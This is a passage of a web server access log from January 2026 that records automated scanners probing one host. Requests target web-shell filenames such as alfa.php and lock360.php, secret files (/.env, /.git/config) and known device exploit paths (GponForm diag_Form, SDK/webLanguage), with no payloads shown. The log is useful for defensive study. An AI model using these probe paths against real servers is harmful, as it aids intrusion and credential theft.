[Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:37 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-admin/css/colors/blue/index.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:37 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/css.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:37 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/alfa.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:37 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wen.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:37 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/x.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:37 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/xxxx.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:37 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "//class.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:37 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-admin/css/colors/midnight/about.php?p=" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:37 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/gec.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:37 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/f35.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:37 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-admin/about.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:37 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/pp.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:37 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/update/f35.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:37 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-content/themes/about.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:37 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "//lock360.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:37 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "//galex.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:37 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/as.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:37 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/class-t.api.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:37 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/bipas.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:38 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/shoyo.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:38 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/admin.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:38 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ar.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:38 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/blurbs18.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:38 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/radio.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:38 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-good.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:38 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/bless14.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:38 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/d2.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:38 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/.well-known/gecko-litespeed.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:38 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-admin/maint/about.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:38 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-content/admin.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:38 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-admin/setup-config.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:38 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-includes/ID3/about.php?p=" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:38 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/.well-known/admin.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:39 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-includes/customize/about.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:39 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-content/plugins/pwnd/as.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:39 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/zwso.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:39 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/d1.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:39 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/bless.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:39 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/X7x.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:39 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/class20.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:39 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/lock360.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:39 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "//wp-content/themes/about.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:39 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/themes.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:39 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/gifclass4.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:39 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wag.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:39 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/xvent.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:39 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-aaa.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:39 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ut.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:40 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/class19.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:40 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ooo.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:40 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/166.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:40 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/bypass.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:40 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/plss3.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:40 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/atomlib.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:40 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/we.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:40 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/t.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:40 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/bp.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:40 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-admin/user/about.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:40 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/geck.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:40 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wpc.php?p=" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:40 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/gecko.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:40 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/a.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:40 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/admins.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:40 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-configs.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:40 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/thai.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:40 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:40 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/fclas.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:41 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/main.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:41 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/a1.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:41 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/class.1.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:41 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/lala.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:41 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/tox.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:41 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/gg.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:41 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/aaa.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:41 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/a2.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:41 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-content/upgrade/about.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:41 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/index/function.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:41 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ee.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:41 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/alfanew.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:41 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/admin/function.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:41 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-includes/assets/index.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:41 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-admin/images/index.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:41 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/elaina.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:42 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/kr.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:42 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/aaaa.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:42 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/to.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:42 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/class-admin.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:19:42 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/nyan.php" [Client 40.113.19.56] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:05:21:10 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:05:24:18 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:05:26:00 +0000] 200 - GET http 91.82.83.208 "/" [Client 43.154.250.181] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[24/Jan/2026:05:37:42 +0000] 404 - GET http 91.82.83.208 "/developmentserver/metadatauploader" [Client 20.118.202.126] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[24/Jan/2026:05:42:06 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:05:46:44 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:05:54:06 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 185.224.128.136] [Length 154] [Gzip -] "-" "-" +[24/Jan/2026:06:00:38 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:06:04:23 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.132.23.201] [Length 154] [Gzip -] "-" "-" +[24/Jan/2026:06:04:30 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.132.23.201] [Length 154] [Gzip -] "-" "-" +[24/Jan/2026:06:04:31 +0000] 200 - GET http 91.82.83.208 "/" [Client 3.132.23.201] [Length 568] [Gzip 1.86] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[24/Jan/2026:06:04:33 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.132.23.201] [Length 154] [Gzip -] "-" "-" +[24/Jan/2026:06:05:01 +0000] 200 - GET http 91.82.83.208 "/" [Client 3.132.23.201] [Length 568] [Gzip 1.86] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[24/Jan/2026:06:07:15 +0000] 404 - GET http 91.82.83.208 "/actuator/gateway/routes" [Client 79.124.40.174] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:06:07:29 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:06:07:31 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:06:12:59 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:06:19:13 +0000] 400 - GET http 91.82.83.208 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[24/Jan/2026:06:34:31 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.61.209.92] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:06:35:03 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:06:38:03 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:06:49:29 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:06:51:29 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:06:52:53 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[24/Jan/2026:06:54:18 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:06:56:22 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 204.76.203.6] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:06:56:32 +0000] 400 - - http localhost "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[24/Jan/2026:06:58:45 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[24/Jan/2026:07:01:29 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:07:02:13 +0000] 400 - - http localhost "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[24/Jan/2026:07:04:23 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[24/Jan/2026:07:06:01 +0000] 200 - GET http 91.82.83.208 "/" [Client 176.12.6.42] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-" +[24/Jan/2026:07:07:40 +0000] 400 - - http localhost "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[24/Jan/2026:07:09:51 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[24/Jan/2026:07:12:57 +0000] 400 - - http localhost "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[24/Jan/2026:07:14:19 +0000] 400 - GET http 91.82.83.208 "/" [Client 185.12.59.118] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0" "-" +[24/Jan/2026:07:15:10 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[24/Jan/2026:07:17:41 +0000] 405 - POST http 91.82.83.208 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[24/Jan/2026:07:17:45 +0000] 404 - GET http 91.82.83.208 "/.git/config" [Client 213.209.159.181] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" "-" +[24/Jan/2026:07:17:57 +0000] 400 - - http localhost "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[24/Jan/2026:07:18:26 +0000] 404 - GET http 91.82.83.208 "/.env" [Client 77.83.39.218] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Linux; U; Android 1.5; en-us; htc_bahamas Build/CRB17) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1" "-" +[24/Jan/2026:07:20:15 +0000] 404 - GET http 91.82.83.208 "/.env" [Client 77.83.39.218] [Length 122] [Gzip 1.35] "Mozilla/5.0 (iPad; CPU OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) CriOS/30.0.1599.12 Mobile/11A465 Safari/8536.25 (3B92C18B-D9DE-4CB7-A02A-22FD2AF17C8F)" "-" +[24/Jan/2026:07:20:16 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[24/Jan/2026:07:23:31 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 93.174.93.12] [Length 1033] [Gzip -] "Mozilla/5.0 (OS/2; Warp 4.5; rv:31.0) Gecko/20100101 Firefox/31.0" "-" +[24/Jan/2026:07:24:59 +0000] 404 - GET http 91.82.83.208 "/cgi-bin/luci/;stok=/locale" [Client 91.224.92.115] [Length 150] [Gzip -] "-" "-" +[24/Jan/2026:07:25:17 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[24/Jan/2026:07:26:23 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:07:27:49 +0000] 400 - - http localhost "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[24/Jan/2026:07:27:58 +0000] 404 - POST http 127.0.0.1 "/GponForm/diag_Form?images/" [Client 103.48.64.85] [Length 122] [Gzip 1.35] "Hello, World" "-" +[24/Jan/2026:07:27:59 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 103.48.64.85] [Length 154] [Gzip -] "-" "-" +[24/Jan/2026:07:28:03 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 79.124.40.174] [Length 154] [Gzip -] "-" "-" +[24/Jan/2026:07:28:56 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:07:32:46 +0000] 400 - - http localhost "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[24/Jan/2026:07:33:28 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:07:35:28 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[24/Jan/2026:07:37:49 +0000] 400 - - http localhost "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[24/Jan/2026:07:38:34 +0000] 200 - GET http 91.82.83.208 "/" [Client 147.185.132.110] [Length 568] [Gzip 1.86] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" +[24/Jan/2026:07:42:34 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:07:42:58 +0000] 200 - GET http 91.82.83.208 "/" [Client 115.164.44.19] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.1" "-" +[24/Jan/2026:07:52:32 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:07:58:43 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) 